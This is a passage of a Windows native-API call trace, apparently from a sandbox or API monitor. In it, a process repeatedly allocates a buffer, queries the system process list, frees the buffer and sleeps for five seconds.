SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.801] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.809] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.816] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.825] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.832] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.841] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.850] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.858] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.866] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.874] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.874] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.881] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.889] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.897] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.902] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.902] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.906] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.910] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.910] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.917] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.926] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.933] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.943] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.951] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.958] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0284.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0284.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0284.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0284.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0284.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0284.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0284.967] 